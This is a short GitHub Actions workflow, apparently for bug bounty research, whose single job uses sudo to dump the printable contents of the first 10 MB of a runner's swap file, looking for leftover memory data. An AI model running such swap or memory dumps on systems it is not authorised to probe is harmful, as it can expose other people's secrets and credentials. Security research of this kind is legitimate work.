name: Github BugBounty Memory Debug

on:
  workflow_dispatch:

jobs:
  extract-swap:
    runs-on: ubuntu-latest
    steps:
    - name: Check and locate swap
      id: swap
      run: |
        ls -ahl /mnt/swapfile
        sudo whoami
        sudo python3 -c "print(''.join(chr(b) for b in open('/mnt/swapfile','rb').read(1024*1024*10) if 32 <= b <= 126 or b in (9, 10, 13)))"
        # sudo head -c 1048576 yourfile.txt
        # strings yourfile.txt
